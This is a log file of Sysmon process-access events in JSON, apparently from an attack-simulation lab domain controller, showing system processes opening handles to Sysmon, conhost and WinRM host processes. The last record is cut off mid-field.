{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5490,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5491,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5492,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5493,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5494,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5495,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","TargetProcessId":"796","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5496,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.994\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-00108D0B0800}\r\nTargetProcessId: 3140\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.994","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00108D0B0800}","TargetProcessId":"3140","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5497,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.994\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-00108D0B0800}\r\nTargetProcessId: 3140\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.994","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00108D0B0800}","TargetProcessId":"3140","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5498,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.009\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 1048\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-00108D0B0800}\r\nTargetProcessId: 3140\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 